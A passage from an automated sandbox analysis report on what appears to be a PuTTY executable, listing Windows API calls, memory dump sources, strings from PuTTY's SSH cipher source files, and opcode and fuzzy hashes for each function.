                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00451168
                            • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00451179
                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004511BF
                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 004511FD
                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 00451223
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Virtual$Query$AllocInfoProtectSystem
                            • String ID:
                            • API String ID: 4136887677-0
                            • Opcode ID: adf9129c82db4715b64c1a383a51b80f52bd6a301ab6abf922e7c8d3d0fe80ad
                            • Instruction ID: cc3db2dffd67338f958d737961886c439312cb579bc19fc2073c058f49ace2ba
                            • Opcode Fuzzy Hash: adf9129c82db4715b64c1a383a51b80f52bd6a301ab6abf922e7c8d3d0fe80ad
                            • Instruction Fuzzy Hash: C9319132D0061DEBDF10CBE4DD45AED7BB8EB08356F1406A6EE01E3251D6349A44DB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • OpenClipboard.USER32(00000000), ref: 00440066
                            • GetClipboardData.USER32(0000000D), ref: 00440079
                            • GetClipboardData.USER32(00000001), ref: 00440086
                            • SendMessageA.USER32(?,00008006,00000000,00000000), ref: 00440098
                            • CloseClipboard.USER32 ref: 0044009E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Clipboard$Data$CloseMessageOpenSend
                            • String ID:
                            • API String ID: 2111581930-0
                            • Opcode ID: bee2f5490eb9ce96538574b04d71f22d84026a07e542f81de3d711be0a4561b8
                            • Instruction ID: 7a0e2718f5867bdbb93ad74b44e771202b378d31b80c994a23b6919ce1e6c93f
                            • Opcode Fuzzy Hash: bee2f5490eb9ce96538574b04d71f22d84026a07e542f81de3d711be0a4561b8
                            • Instruction Fuzzy Hash: 80E04F31249311AAF7301B70BD0AF673A9CBB04B42F004032BF01E91E6DAB5C8149A79
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: !(i == our_curs_y && j == our_curs_x)$..\terminal.c$@$@$`
                            • API String ID: 0-1243757527
                            • Opcode ID: 7b7af070eb6655b46370d08e1c64e3dea5bdaa77c877164e9b72da63f4613a2a
                            • Instruction ID: b0b9c71d44da66f83b29f1798291cfd128640d5441f2a41c52ea14c490f23a4a
                            • Opcode Fuzzy Hash: 7b7af070eb6655b46370d08e1c64e3dea5bdaa77c877164e9b72da63f4613a2a
                            • Instruction Fuzzy Hash: 7C721A71E00609DFCB24CFA9C480AAEBBF1FF58314F14956AE455A73A1D738A981CF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: IconicTextWindow_strcat_strlen
                            • String ID:
                            • API String ID: 3044258180-0
                            • Opcode ID: 1efacd514311d1b46e33e878122cfd9694cf60f37f4b63d954c1bf47d9982e03
                            • Instruction ID: 8870b271564465d9390b2bc7c43a6a6860829acf6abd587b94c1c1d49860bd71
                            • Opcode Fuzzy Hash: 1efacd514311d1b46e33e878122cfd9694cf60f37f4b63d954c1bf47d9982e03
                            • Instruction Fuzzy Hash: 1EF03031909312BEDB212B32BC0AF5B3E5DEF05365B24443AFD08A51B2DB799854DA9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: IconicTextWindow_strcat_strlen
                            • String ID:
                            • API String ID: 3044258180-0
                            • Opcode ID: 3de367654d153f0fee72e1a29e88b8457e0cf9f262e7467c9e253fb7e80188f6
                            • Instruction ID: 285c1cc5330c24e04cc69d3a2dc678eb98b0a0c19864efcf3eae4b8b6efc2576
                            • Opcode Fuzzy Hash: 3de367654d153f0fee72e1a29e88b8457e0cf9f262e7467c9e253fb7e80188f6
                            • Instruction Fuzzy Hash: 6BF0A930904300AEEB212B22BC0AF8B3E19EF04364B14443AF908A51B2DBB99844CA9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d515654040908bfa7b5c2dac0c435a55bc2e858434d60fe346d155844840ee1
                            • Instruction ID: 2b91986adb94b83a3d07655932db3e303801b5a567237a181fffc1372874cb76
                            • Opcode Fuzzy Hash: 8d515654040908bfa7b5c2dac0c435a55bc2e858434d60fe346d155844840ee1
                            • Instruction Fuzzy Hash: C0F0EC31904109ABCF01AF75EC069AE3BA9BF08345F049026F82DD6171DB38DA569B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • ..\sshaes.c, xrefs: 0041FEBB, 0041FEE1
                            • keylen == 16 || keylen == 24 || keylen == 32, xrefs: 0041FEE6
                            • blocklen == 16 || blocklen == 24 || blocklen == 32, xrefs: 0041FEC0
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: ..\sshaes.c$blocklen == 16 || blocklen == 24 || blocklen == 32$keylen == 16 || keylen == 24 || keylen == 32
                            • API String ID: 3058806289-2664803400
                            • Opcode ID: 91f76b9de93aba96b3efc9820180f6b3da2173b4f6f8d63f95b4257f8810ca5f
                            • Instruction ID: e7bfad14ba9d184952e1e1946a314721028fbb87887949ef8f726ce860f398c4
                            • Opcode Fuzzy Hash: 91f76b9de93aba96b3efc9820180f6b3da2173b4f6f8d63f95b4257f8810ca5f
                            • Instruction Fuzzy Hash: 3F713C70B006909BEB198F69D4E42BDBBE1AB85305F1C41AFD496DB382D3789782CB15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsIconic.USER32(00435EBD), ref: 0044045C
                            • ShowWindow.USER32(00000006), ref: 00440480
                            Similarity
                            • API ID: IconicShowWindow
                            • String ID:
                            • API String ID: 3061500023-0
                            • Opcode ID: 0285cf9ce5a35cbf164b3408eb907e83ec6c6d7680e02e74263fe2eebfb7b380
                            • Instruction ID: a786cc0d30aeb2bfed0d47b41dfe5fee4c733daf78a7ccae78aba84c74c9ff36
                            • Opcode Fuzzy Hash: 0285cf9ce5a35cbf164b3408eb907e83ec6c6d7680e02e74263fe2eebfb7b380
                            • Instruction Fuzzy Hash: 45D09E34508302DAFF714F20EC087173EA1AB40782F14C93AA745511F5C7B994E4DA1A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshdes.c
                            • API String ID: 3058806289-2384998143
                            • Opcode ID: 8fc4884c044305dc187211cea22a524b7930495f083181d8a33a548e24267401
                            • Instruction ID: 0cd761f1b8826d08513454f7da2d91d9a542fd689f4bd978dcea94ed937cea74
                            • Opcode Fuzzy Hash: 8fc4884c044305dc187211cea22a524b7930495f083181d8a33a548e24267401
                            • Instruction Fuzzy Hash: E1410930B042579BCB18DBBC88905EFBBF1AF95200B64C16ED9D6E3342E5749909C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshblowf.c
                            • API String ID: 3058806289-2157365526
                            • Opcode ID: 8d4ba63a1de2902efd69fa975b5b5a7766fbac25f7da248e2e1f1ddc17a83b30
                            • Instruction ID: fa06c40aed5488884f675a2c2442bc32015051b5e8db4978bbc774582bf9a6dd
                            • Opcode Fuzzy Hash: 8d4ba63a1de2902efd69fa975b5b5a7766fbac25f7da248e2e1f1ddc17a83b30
                            • Instruction Fuzzy Hash: 8C31BF34A042989FCB24CB7C88904EEBFF19F95300B24C8ADE8DA97742D1349A45CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 15) == 0$..\sshaes.c
                            • API String ID: 3058806289-4253567812
                            • Opcode ID: 39c03802b4b139962ac18af30598b4db2484c33d0879b96a6138b1a2e24f915c
                            • Instruction ID: 5560cb8573177143c7b248a0e4f2c973140b386e89ef5fde31bc778f6cdda6fd
                            • Opcode Fuzzy Hash: 39c03802b4b139962ac18af30598b4db2484c33d0879b96a6138b1a2e24f915c
                            • Instruction Fuzzy Hash: 41316D72E04258ABDB00DBA89CC5ADFBBF9DF98304F58C096D980E7353D574AA05C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 15) == 0$..\sshaes.c
                            • API String ID: 3058806289-4253567812
                            • Opcode ID: 39a2aec4a6f876aecef57f130de4d61eaecdb3bec2e79a3f5fb69e9add59cac8
                            • Instruction ID: 9cb18ac13ca3d937052d18ce0ae72096ce804e63e4fb5e78269a984e7b693336
                            • Opcode Fuzzy Hash: 39a2aec4a6f876aecef57f130de4d61eaecdb3bec2e79a3f5fb69e9add59cac8
                            • Instruction Fuzzy Hash: 93313A72A012489FDB10CF6DD8C59CEBBF5EF98304F2880ABD98197312D234A605CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshblowf.c
                            • API String ID: 3058806289-2157365526
                            • Opcode ID: b3813f663f5a1a42be7bcb743804f3b9a7391995b6df99efa3635f3cd2ac36b0
                            • Instruction ID: d4e2410c64245cf248ca789a7ba6db4b125ccfb951a5ed498094f94bf36dc636
                            • Opcode Fuzzy Hash: b3813f663f5a1a42be7bcb743804f3b9a7391995b6df99efa3635f3cd2ac36b0
                            • Instruction Fuzzy Hash: 4831A5306083959BDB1CCB6C80A54BEBFF19F95300B48C4AED8DB57382D5746904CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshblowf.c
                            • API String ID: 3058806289-2157365526
                            • Opcode ID: 6e34624de4dcc7ae275da9368b840e7b6fdc17c102f74152e7305317c9238a73
                            • Instruction ID: 447d0adc11a55a4fc78706abd4f9bfd49139788a2d576f58e46ae354825880e7
                            • Opcode Fuzzy Hash: 6e34624de4dcc7ae275da9368b840e7b6fdc17c102f74152e7305317c9238a73
                            • Instruction Fuzzy Hash: 8631B2306083959BDB2CCB58C4A14FEBFF19F95300B48C4AED8DB57382D178AA04CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshdes.c
                            • API String ID: 3058806289-2384998143
                            • Opcode ID: b57908f01f438b9567002f50d0854b1fab9aaf4f26a0a65fb0e902619aa97678
                            • Instruction ID: b988923e2a28fabb8b36c5cfd66673ddfe9988f75868161668a98fb33167be7d
                            • Opcode Fuzzy Hash: b57908f01f438b9567002f50d0854b1fab9aaf4f26a0a65fb0e902619aa97678
                            • Instruction Fuzzy Hash: E1210E30F087915BD72DCB3E48912ABFFE2AFC5200B54C56ED4EA93786D974A408C361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: 1174b44c0ffb4cbce4371fd5b0015ca8b2343b9f7b4138c4f3070b2e06bba974
                            • Instruction ID: ddeeb02650ad62c0c015ac1f95b22953e0920b97248c58268754c6389f08c05a
                            • Opcode Fuzzy Hash: 1174b44c0ffb4cbce4371fd5b0015ca8b2343b9f7b4138c4f3070b2e06bba974
                            • Instruction Fuzzy Hash: 88121273E016299BEB40CE8ACC8059DF7B3AFCC714B6B8255C954AB315CAB16D13DAC4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLocalTime.KERNEL32(00408E81,?,?,?,?,?,?,?,?,004090C6,00408E81,00000000,0043D0FD,00000000,00408E81,0043D0FD), ref: 0044A4A5
                            Similarity
                            • API ID: LocalTime
                            • String ID:
                            • API String ID: 481472006-0
                            • Opcode ID: 9b6a6f31c472e80fe0936be739a937f6ab700674785b2961b27584579ba31337
                            • Instruction ID: 626f7b470001cebec97681173cf9fec6dc4fffe566e0104071bdd1987e39418b
                            • Opcode Fuzzy Hash: 9b6a6f31c472e80fe0936be739a937f6ab700674785b2961b27584579ba31337
                            • Instruction Fuzzy Hash: C001D375D01228AEDF50DFE9D9442FEBBF4BB08712F10012AE951F2280E3788A84DB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CoCreateInstance.OLE32(0046C8B4,00000000,00000001,0046C904,00410EAC,00410EAC,?,00410EAC,?,?,?), ref: 0044631A
                            Similarity
                            • API ID: CreateInstance
                            • String ID:
                            • API String ID: 542301482-0
                            • Opcode ID: 65d908ce69fc7afbbb07a0aae355a21bf4734d3add0ac4ed41daff30d411855a
                            • Instruction ID: 11e1bc9725f136e68bba1cb60a6f2ef34096cadb4caf453c060c56412b946243
                            • Opcode Fuzzy Hash: 65d908ce69fc7afbbb07a0aae355a21bf4734d3add0ac4ed41daff30d411855a
                            • Instruction Fuzzy Hash: F6F09030244344EBEB14DF90CD49F2937A9AB42719F60006BF805D72A1E678ED85DA0F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • recv.WS2_32(?,00000001,00000001,00000002), ref: 00448144
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: 1e3e2e20267913357749b9c52b004b248e4a8e32dc657b820fb32351411d73c1
                            • Instruction ID: 192e91540a9a6be75b5ed166a2cc6303bacea28c093635082a62c6b7bc9fabc6
                            • Opcode Fuzzy Hash: 1e3e2e20267913357749b9c52b004b248e4a8e32dc657b820fb32351411d73c1
                            • Instruction Fuzzy Hash: E1F03031100705AFEB209F15D846B5673E8AB08721F10452FF54995590D775E8C18B48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 00455810
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: e44efea71dfc90e1b967a31170035ca24474a19816daf72572bc8b3d79856c1c
                            • Instruction ID: 5cdd6ed3f688020c3008d279080f58c70b02821d54888d596078697fdf8e0b1b
                            • Opcode Fuzzy Hash: e44efea71dfc90e1b967a31170035ca24474a19816daf72572bc8b3d79856c1c
                            • Instruction Fuzzy Hash: 52E0D834D04208BFEB00EFA4D806A9D7BB9AB04319F1041BAFA11D71D1E774D618875D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000014), ref: 0043E50C
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: c60109a3f305dc84f7657a645f7de33aa3a743a68cb2001b8f29152b801f0f82
                            • Instruction ID: 82277be5a015cc95de435b55b2a9906a4be2369b005da3b0c475f390d4adeede
                            • Opcode Fuzzy Hash: c60109a3f305dc84f7657a645f7de33aa3a743a68cb2001b8f29152b801f0f82
                            • Instruction Fuzzy Hash: 76D05E7190020DABDB10EBA8A9469EB37ACA708709F500022B701E70C1EAB4D58487BA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsIconic.USER32(004360BC), ref: 00440542
                            Similarity
                            • API ID: Iconic
                            • String ID:
                            • API String ID: 110040809-0
                            • Opcode ID: 01f3b7542dc22937ca33c569baffefc7ace0f52dffbef36b60741c2f2e6ffba5
                            • Instruction ID: 11b9000fa584375a0b9b51f158161c9e00ca55337da68ff7512ebaab25b62ff1
                            • Opcode Fuzzy Hash: 01f3b7542dc22937ca33c569baffefc7ace0f52dffbef36b60741c2f2e6ffba5
                            • Instruction Fuzzy Hash: 39900230408201CBCF225F10FD084043E61AB41312354847498094013586215454EA18
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5b2ff5968d51a9160e2abf9e189b9800403d059b4abd0ca2c7f3401aa3e929ce
                            • Instruction ID: 6402d58727007459adb0680b73d1e62d1e9fcfe9fadb7a9255079db527cb6f7d
                            • Opcode Fuzzy Hash: 5b2ff5968d51a9160e2abf9e189b9800403d059b4abd0ca2c7f3401aa3e929ce
                            • Instruction Fuzzy Hash: 0C722977E416289BDB00CF8ADCC05C9F7A3AFC821871F82A5CD5877706C6B56A16CAD4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 364dee75c6befb6237df2ecbcbe3fb3ef837ff37e627075f05bf0bb1fac41d69
                            • Instruction ID: ae97241ff2cf17f85e166319fcf74cd23fe1f092bddd5814e496af8f199a6778
                            • Opcode Fuzzy Hash: 364dee75c6befb6237df2ecbcbe3fb3ef837ff37e627075f05bf0bb1fac41d69
                            • Instruction Fuzzy Hash: 13621237A147159FD780CFEDECC018973A2ABC9324B5E4162D72497321E6B0FA12CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fabba3fe950ae1bcfa4d796252593d61a63553a36083935c793564febc39bb79
                            • Instruction ID: 5ef1b0d2ffaa4885f58537b38ec6275ba307525a180077d90f368ed86c03d9ce
                            • Opcode Fuzzy Hash: fabba3fe950ae1bcfa4d796252593d61a63553a36083935c793564febc39bb79
                            • Instruction Fuzzy Hash: 07621237A147159FD780CFEDECC018973A2ABC9324B5E4162D72497311E6B0FA12CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 26b8c96e2db258a64414575f560a2d1352f123ae35c8f676e191c5cfd9513365
                            • Instruction ID: cc99fa783e8559638cf01c2deb7ad221f14d187179a55751c6bc2e3c2cbd6906
                            • Opcode Fuzzy Hash: 26b8c96e2db258a64414575f560a2d1352f123ae35c8f676e191c5cfd9513365
                            • Instruction Fuzzy Hash: 0812E6319443865EDF228A28C4553BEBBA29F12308F5840BBD4D17B3C2D33D59A6979B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11bca2f3998d5e1c555a7d1e188298ee0288af6fc8e50b56c6d098b76afc558c
                            • Instruction ID: a4364ec9d9b6041d67576809bd19351a4c05985e040c9834558ca6c25888b273
                            • Opcode Fuzzy Hash: 11bca2f3998d5e1c555a7d1e188298ee0288af6fc8e50b56c6d098b76afc558c
                            • Instruction Fuzzy Hash: E00209B4A04B019FC728CF19C180866B7F1FF8C314B25966EE55A8B765DB34E952CF88
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a580cb18ab53e2da2cc0d65b37870cc362b9fff5a91ee5415e12bd2bbc4b65c9
                            • Instruction ID: 045fc52ab86031addbcb24abf520f82f3081c04814c1f8e7911806aef685512c
                            • Opcode Fuzzy Hash: a580cb18ab53e2da2cc0d65b37870cc362b9fff5a91ee5415e12bd2bbc4b65c9
                            • Instruction Fuzzy Hash: A9D11A31D559489EEB24CF98D4657BE7BB1EB40347F284027EC05DA293D67C898ACB0A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e99c08ec6774923fd5302d9a4b2fe03c248f393151ce4d3564445fcf5ab5504e
                            • Instruction ID: e1cc79ceafa2ed9784f0590250e2cf103de82f4f54ea58c90b078dcc73a76605
                            • Opcode Fuzzy Hash: e99c08ec6774923fd5302d9a4b2fe03c248f393151ce4d3564445fcf5ab5504e
                            • Instruction Fuzzy Hash: F7D17E70A00B118FD728CF29E490A66B7F1FF58314FA14A2ED49A87791D778F486CB49
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
